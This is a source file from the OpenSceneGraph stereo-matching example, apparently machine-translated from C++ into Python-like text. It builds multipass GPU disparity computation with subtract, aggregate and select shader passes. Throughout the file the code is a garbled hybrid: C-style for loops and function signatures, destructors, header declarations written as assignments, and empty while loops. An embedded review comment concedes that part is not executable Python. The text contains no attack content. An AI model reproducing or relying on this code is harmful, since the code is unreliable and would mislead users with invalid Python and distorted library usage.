        geomss[i].setMode(GL_LIGHTING, osg.StateAttribute.OFF)

        texture[i] = osg.TextureRectangle()
        texture[i].setResizeNonPowerOfTwoHint(False)
        texture[i].setFilter(osg.Texture.MIN_FILTER, osg.Texture.LINEAR)
        texture[i].setFilter(osg.Texture.MAG_FILTER, osg.Texture.LINEAR)

        geode.addDrawable(geom)

    # attach the input images to the bottom textures of the view
    texture[0].setImage(left)
    texture[1].setImage(right)
    geomss[0].setTextureAttributeAndModes(0, texture[0], osg.StateAttribute.ON)
    geomss[1].setTextureAttributeAndModes(0, texture[1], osg.StateAttribute.ON)

    topnode.addChild(geode)

    # create the processing passes
    if single_pass:
        stereopass = StereoPass(texture[0], texture[1],
                                width, height,
                                min_disp, max_disp, window_size)
        topnode.addChild(stereopass.getRoot())
        # attach the output of the processing to the top left geom
        geomss[2].setTextureAttributeAndModes(0,
                                              stereopass.getOutputTexture(),
                                              osg.StateAttribute.ON)
    else:
        stereomp = StereoMultipass(texture[0], texture[1],
                                   width, height,
                                   min_disp, max_disp, window_size)
        topnode.addChild(stereomp.getRoot())
        # attach the output of the processing to the top left geom
        geomss[2].setTextureAttributeAndModes(0,
                                              stereomp.getOutputTexture(),
                                              osg.StateAttribute.ON)

    return topnode
# NOTE(review): this block is a literal machine translation of the C++
# osgstereomatch example `main` — the C-style signature below and the
# `while arguments.read(...)` option loops are C++ idioms and this block is
# NOT executable Python as-is. Kept byte-identical; comments only.
int main(int argc, char *argv[])
# use an ArgumentParser object to manage the program arguments.
arguments = osg.ArgumentParser(argv)
# set up the usage document, in case we need to print out how to use this program.
arguments.getApplicationUsage().setDescription(arguments.getApplicationName()+" is the example which demonstrates a stereo matching algorithm. It uses multiple render targets and multiple passes with texture ping-pong.")
arguments.getApplicationUsage().setCommandLineUsage(arguments.getApplicationName()+" [options] --left left_image --right right_image --min min_disparity --max max_disparity --window window_size")
arguments.getApplicationUsage().addCommandLineOption("-h or --help","Display this information")
arguments.getApplicationUsage().addCommandLineOption("--left","The left image of the stereo pair to load.")
arguments.getApplicationUsage().addCommandLineOption("--right","The right image of the stereo pair to load.")
arguments.getApplicationUsage().addCommandLineOption("--min","The minimum disparity to start matching pixels.")
arguments.getApplicationUsage().addCommandLineOption("--max","The maximum disparity to stop matching pixels.")
arguments.getApplicationUsage().addCommandLineOption("--window","The window size used to match areas around pixels.")
arguments.getApplicationUsage().addCommandLineOption("--single","Use a single pass instead on multiple passes.")
# if user request help write it out to cout.
if arguments.read("-h") or arguments.read("--help") :
arguments.getApplicationUsage().write(std.cout)
return 1
# parse required/optional options; in the C++ original each `while read`
# drains repeated occurrences of the flag, writing into the variable above it.
leftName = str("")
while arguments.read("--left", leftName) :
rightName = str("")
while arguments.read("--right", rightName) :
minDisparity = 0
while arguments.read("--min", minDisparity) :
maxDisparity = 31
while arguments.read("--max", maxDisparity) :
windowSize = 5
while arguments.read("--window", windowSize) :
useSinglePass = False
while arguments.read("--single") : useSinglePass = True
# both input images are mandatory; bail out with usage text otherwise.
if leftName == "" or rightName=="" :
arguments.getApplicationUsage().write(std.cout)
return 1
# load the images
leftIm = osgDB.readImageFile(leftName)
rightIm = osgDB.readImageFile(rightName)
scene = createScene(leftIm, rightIm, minDisparity, maxDisparity, windowSize, useSinglePass)
# construct the viewer.
viewer = osgViewer.Viewer()
viewer.setThreadingModel(osgViewer.Viewer.SingleThreaded)
# add the stats handler
viewer.addEventHandler(osgViewer.StatsHandler)()
viewer.setSceneData(scene)
return viewer.run()
# Translated from file 'StereoMultipass.cpp'
# -*- Mode: C++ tab-width: 4 indent-tabs-mode: t c-basic-offset: 4 -*-
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include "StereoMultipass.h"
#include <osgDB/FileUtils>
#include <iostream>
SubtractPass.SubtractPass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int start_disparity) :
_TextureWidth(width),
_TextureHeight(height),
_StartDisparity(start_disparity)
_RootGroup = osg.Group()
_InTextureLeft = left_tex
_InTextureRight = right_tex
createOutputTextures()
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_subtract.frag")
SubtractPass.~SubtractPass()
osg.Group SubtractPass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_colors = osg.Vec4Array()
quad_colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
quad_geom.setColorArray(quad_colors, osg.Array.BIND_OVERALL)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
_StateSet.setTextureAttributeAndModes(0, _InTextureLeft, osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(1, _InTextureRight, osg.StateAttribute.ON)
_StateSet.addUniform(osg.Uniform("textureLeft", 0))
_StateSet.addUniform(osg.Uniform("textureRight", 1))
_StateSet.addUniform(osg.Uniform("start_disparity", _StartDisparity))
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void SubtractPass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(0.1,0.1,0.3,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
# attach the 4 textures
for (int i=0 i<4 i++)
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+i), _OutTexture[i])
void SubtractPass.createOutputTextures()
for (int i=0 i<4 i++)
_OutTexture[i] = osg.TextureRectangle()
_OutTexture[i].setTextureSize(_TextureWidth, _TextureHeight)
_OutTexture[i].setInternalFormat(GL_RGBA)
_OutTexture[i].setFilter(osg.Texture2D.MIN_FILTER,osg.Texture2D.LINEAR)
_OutTexture[i].setFilter(osg.Texture2D.MAG_FILTER,osg.Texture2D.LINEAR)
void SubtractPass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
#XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
AggregatePass.AggregatePass(osg.TextureRectangle *diff_tex0,
osg.TextureRectangle *diff_tex1,
osg.TextureRectangle *diff_tex2,
osg.TextureRectangle *diff_tex3,
osg.TextureRectangle *agg_tex_in,
osg.TextureRectangle *agg_tex_out,
int width, int height,
int start_disparity, int window_size):
_TextureWidth(width),
_TextureHeight(height),
_StartDisparity(start_disparity),
_WindowSize(window_size)
_RootGroup = osg.Group()
_InTextureDifference[0] = diff_tex0
_InTextureDifference[1] = diff_tex1
_InTextureDifference[2] = diff_tex2
_InTextureDifference[3] = diff_tex3
_InTextureAggregate = agg_tex_in
_OutTextureAggregate = agg_tex_out
_OutTexture = _OutTextureAggregate
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_aggregate.frag")
AggregatePass.~AggregatePass()
osg.Group AggregatePass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_colors = osg.Vec4Array()
quad_colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
quad_geom.setColorArray(quad_colors, osg.Array.BIND_OVERALL)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
_StateSet.setTextureAttributeAndModes(0, _InTextureDifference[0], osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(1, _InTextureDifference[1], osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(2, _InTextureDifference[2], osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(3, _InTextureDifference[3], osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(4, _InTextureAggregate, osg.StateAttribute.ON)
_StateSet.addUniform(osg.Uniform("textureDiff0", 0))
_StateSet.addUniform(osg.Uniform("textureDiff1", 1))
_StateSet.addUniform(osg.Uniform("textureDiff2", 2))
_StateSet.addUniform(osg.Uniform("textureDiff3", 3))
_StateSet.addUniform(osg.Uniform("textureAggIn", 4))
_StateSet.addUniform(osg.Uniform("start_disparity", _StartDisparity))
_StateSet.addUniform(osg.Uniform("window_size", _WindowSize))
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void AggregatePass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(0.1,0.1,0.3,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+0), _OutTexture)
void AggregatePass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
SelectPass.SelectPass(osg.TextureRectangle *in_tex,
int width, int height,
int min_disparity, int max_disparity) :
_TextureWidth(width),
_TextureHeight(height),
_MinDisparity(min_disparity),
_MaxDisparity(max_disparity)
_RootGroup = osg.Group()
_InTexture = in_tex
createOutputTextures()
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_select.frag")
SelectPass.~SelectPass()
osg.Group SelectPass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_colors = osg.Vec4Array()
quad_colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
quad_geom.setColorArray(quad_colors, osg.Array.BIND_OVERALL)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
_StateSet.setTextureAttributeAndModes(0, _InTexture, osg.StateAttribute.ON)
_StateSet.addUniform(osg.Uniform("textureIn", 0))
_StateSet.addUniform(osg.Uniform("min_disparity", _MinDisparity))
_StateSet.addUniform(osg.Uniform("max_disparity", _MaxDisparity))
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void SelectPass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(0.1,0.1,0.3,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+0), _OutTexture)
void SelectPass.createOutputTextures()
_OutTexture = osg.TextureRectangle()
_OutTexture.setTextureSize(_TextureWidth, _TextureHeight)
_OutTexture.setInternalFormat(GL_RGBA)
_OutTexture.setFilter(osg.Texture2D.MIN_FILTER,osg.Texture2D.LINEAR)
_OutTexture.setFilter(osg.Texture2D.MAG_FILTER,osg.Texture2D.LINEAR)
void SelectPass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
StereoMultipass.StereoMultipass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int min_disparity, int max_disparity, int window_size) :
_TextureWidth(width),
_TextureHeight(height)
_RootGroup = osg.Group()
createOutputTextures()
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_clear.frag")
flip=1
flop=0
# we can do 16 differences in one pass,
# but we must ping-pong the aggregate textures between passes
# add passes until we cover the disparity range
for (int i=min_disparity i<=max_disparity i+=16)
subp = SubtractPass(left_tex, right_tex,
width, height,
i)
aggp = AggregatePass(subp.getOutputTexture(0),
subp.getOutputTexture(1),
subp.getOutputTexture(2),
subp.getOutputTexture(3),
_OutTexture[flip],
_OutTexture[flop],
width, height,
i, window_size)
_RootGroup.addChild(subp.getRoot())
_RootGroup.addChild(aggp.getRoot())
flip = 0 if (flip) else 1
flop = 0 if (flop) else 1
# add select pass
_SelectPass = SelectPass(_OutTexture[flip],
width, height,
min_disparity, max_disparity)
_RootGroup.addChild(_SelectPass.getRoot())
StereoMultipass.~StereoMultipass()
osg.Group StereoMultipass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_colors = osg.Vec4Array()
quad_colors.push_back(osg.Vec4(1.0,1.0,1.0,1.0))
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
quad_geom.setColorArray(quad_colors, osg.Array.BIND_OVERALL)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void StereoMultipass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(10.0,0.0,0.0,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
# attach two textures for aggregating results
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+0), _OutTexture[0])
_Camera.attach(osg.Camera.BufferComponent(osg.Camera.COLOR_BUFFER0+1), _OutTexture[1])
void StereoMultipass.createOutputTextures()
for (int i=0 i<2 i++)
_OutTexture[i] = osg.TextureRectangle()
_OutTexture[i].setTextureSize(_TextureWidth, _TextureHeight)
_OutTexture[i].setInternalFormat(GL_RGBA)
_OutTexture[i].setFilter(osg.Texture2D.MIN_FILTER,osg.Texture2D.LINEAR)
_OutTexture[i].setFilter(osg.Texture2D.MAG_FILTER,osg.Texture2D.LINEAR)
# hdr, we want to store floats
_OutTexture[i].setInternalFormat(GL_RGBA16F_ARB)
#_OutTexture[i].setInternalFormat(GL_FLOAT_RGBA32_NV)
#_OutTexture[i].setInternalFormat(GL_FLOAT_RGBA16_NV)
_OutTexture[i].setSourceFormat(GL_RGBA)
_OutTexture[i].setSourceType(GL_FLOAT)
void StereoMultipass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
# Translated from file 'StereoMultipass.h'
# -*- Mode: C++ tab-width: 4 indent-tabs-mode: t c-basic-offset: 4 -*-
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#ifndef STEREOMULTIPASS_H
#define STEREOMULTIPASS_H 1
#include <osg/ref_ptr>
#include <osg/Group>
#include <osg/Camera>
#include <osg/MatrixTransform>
#include <osg/Projection>
#include <osg/Geode>
#include <osg/Geometry>
#include <osg/Texture2D>
#include <osg/TextureRectangle>
class SubtractPass :
SubtractPass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int start_disparity)
~SubtractPass()
def getRoot():
return _RootGroup
def getOutputTexture(i):
return _OutTexture[i]
setShader = void(str filename)
createTexturedQuad = osg.Group()
createOutputTextures = void()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
_InTextureLeft = osg.TextureRectangle()
_InTextureRight = osg.TextureRectangle()
osg.TextureRectangle _OutTexture[4]
_TextureWidth = int()
_TextureHeight = int()
_StartDisparity = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
class AggregatePass :
AggregatePass(osg.TextureRectangle *diff_tex0,
osg.TextureRectangle *diff_tex1,
osg.TextureRectangle *diff_tex2,
osg.TextureRectangle *diff_tex3,
osg.TextureRectangle *agg_tex_in,
osg.TextureRectangle *agg_tex_out,
int width, int height,
int start_disparity, int window_size)
~AggregatePass()
def getRoot():
return _RootGroup
def getOutputTexture():
return _OutTexture
setShader = void(str filename)
createTexturedQuad = osg.Group()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
osg.TextureRectangle _InTextureDifference[4]
_InTextureAggregate = osg.TextureRectangle()
_OutTextureAggregate = osg.TextureRectangle()
_OutTexture = osg.TextureRectangle()
_TextureWidth = int()
_TextureHeight = int()
_StartDisparity = int()
_WindowSize = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
class SelectPass :
SelectPass(osg.TextureRectangle *in_tex,
int width, int height,
int min_disparity, int max_disparity)
~SelectPass()
def getRoot():
return _RootGroup
def getOutputTexture():
return _OutTexture
setShader = void(str filename)
createTexturedQuad = osg.Group()
createOutputTextures = void()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
_InTexture = osg.TextureRectangle()
_OutTexture = osg.TextureRectangle()
_OutImage = osg.Image()
_TextureWidth = int()
_TextureHeight = int()
_MinDisparity = int()
_MaxDisparity = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
class StereoMultipass :
StereoMultipass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int min_disparity, int max_disparity, int window_size)
~StereoMultipass()
def getRoot():
return _RootGroup
def getOutputTexture():
return _SelectPass.getOutputTexture()
setShader = void(str filename)
createTexturedQuad = osg.Group()
createOutputTextures = void()
setupCamera = void()
_RootGroup = osg.Group()
_Camera = osg.Camera()
_InTexture = osg.TextureRectangle()
osg.TextureRectangle _OutTexture[2]
_TextureWidth = int()
_TextureHeight = int()
_FragmentProgram = osg.Program()
_StateSet = osg.StateSet()
*_SelectPass = SelectPass()
flip = int()
flop = int()
#endif #STEREOMULTIPASS_H
# Translated from file 'StereoPass.cpp'
# -*- Mode: C++ tab-width: 4 indent-tabs-mode: t c-basic-offset: 4 -*-
# OpenSceneGraph example, osgstereomatch.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include "StereoPass.h"
#include <osgDB/FileUtils>
#include <iostream>
StereoPass.StereoPass(osg.TextureRectangle *left_tex,
osg.TextureRectangle *right_tex,
int width, int height,
int min_disparity, int max_disparity, int window_size):
_TextureWidth(width),
_TextureHeight(height),
_MinDisparity(min_disparity),
_MaxDisparity(max_disparity),
_WindowSize(window_size)
_RootGroup = osg.Group()
_InTextureLeft = left_tex
_InTextureRight = right_tex
createOutputTextures()
_Camera = osg.Camera()
setupCamera()
_Camera.addChild(createTexturedQuad())
_RootGroup.addChild(_Camera)
setShader("shaders/stereomatch_stereopass.frag")
StereoPass.~StereoPass()
osg.Group StereoPass.createTexturedQuad()
top_group = osg.Group()
quad_geode = osg.Geode()
quad_coords = osg.Vec3Array() # vertex coords
# counter-clockwise
quad_coords.push_back(osg.Vec3d(0, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 0, -1))
quad_coords.push_back(osg.Vec3d(1, 1, -1))
quad_coords.push_back(osg.Vec3d(0, 1, -1))
quad_tcoords = osg.Vec2Array() # texture coords
quad_tcoords.push_back(osg.Vec2(0, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, 0))
quad_tcoords.push_back(osg.Vec2(_TextureWidth, _TextureHeight))
quad_tcoords.push_back(osg.Vec2(0, _TextureHeight))
quad_geom = osg.Geometry()
quad_da = osg.DrawArrays(osg.PrimitiveSet.QUADS,0,4)
quad_geom.setVertexArray(quad_coords)
quad_geom.setTexCoordArray(0, quad_tcoords)
quad_geom.addPrimitiveSet(quad_da)
_StateSet = quad_geom.getOrCreateStateSet()
_StateSet.setMode(GL_LIGHTING,osg.StateAttribute.OFF)
_StateSet.setTextureAttributeAndModes(0, _InTextureLeft, osg.StateAttribute.ON)
_StateSet.setTextureAttributeAndModes(1, _InTextureRight, osg.StateAttribute.ON)
_StateSet.addUniform(osg.Uniform("textureID0", 0))
_StateSet.addUniform(osg.Uniform("textureID1", 1))
_StateSet.addUniform(osg.Uniform("min_disparity", _MinDisparity))
_StateSet.addUniform(osg.Uniform("max_disparity", _MaxDisparity))
_StateSet.addUniform(osg.Uniform("window_size", _WindowSize))
quad_geode.addDrawable(quad_geom)
top_group.addChild(quad_geode)
return top_group
void StereoPass.setupCamera()
# clearing
_Camera.setClearColor(osg.Vec4(1.0,0.0,0.0,1.0))
_Camera.setClearMask(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# projection and view
_Camera.setProjectionMatrix(osg.Matrix.ortho2D(0,1,0,1))
_Camera.setReferenceFrame(osg.Transform.ABSOLUTE_RF)
_Camera.setViewMatrix(osg.Matrix.identity())
# viewport
_Camera.setViewport(0, 0, _TextureWidth, _TextureHeight)
_Camera.setRenderOrder(osg.Camera.PRE_RENDER)
_Camera.setRenderTargetImplementation(osg.Camera.FRAME_BUFFER_OBJECT)
# attach the output texture and use it as the color buffer.
_Camera.attach(osg.Camera.COLOR_BUFFER, _OutTexture)
void StereoPass.createOutputTextures()
_OutTexture = osg.TextureRectangle()
_OutTexture.setTextureSize(_TextureWidth, _TextureHeight)
_OutTexture.setInternalFormat(GL_RGBA)
_OutTexture.setFilter(osg.Texture2D.MIN_FILTER,osg.Texture2D.LINEAR)
_OutTexture.setFilter(osg.Texture2D.MAG_FILTER,osg.Texture2D.LINEAR)
void StereoPass.setShader(str filename)
fshader = osg.Shader( osg.Shader.FRAGMENT )
fshader.loadShaderSourceFromFile(osgDB.findDataFile(filename))
_FragmentProgram = 0
_FragmentProgram = osg.Program()
_FragmentProgram.addShader(fshader)
_StateSet.setAttributeAndModes(_FragmentProgram, osg.StateAttribute.ON | osg.StateAttribute.OVERRIDE )
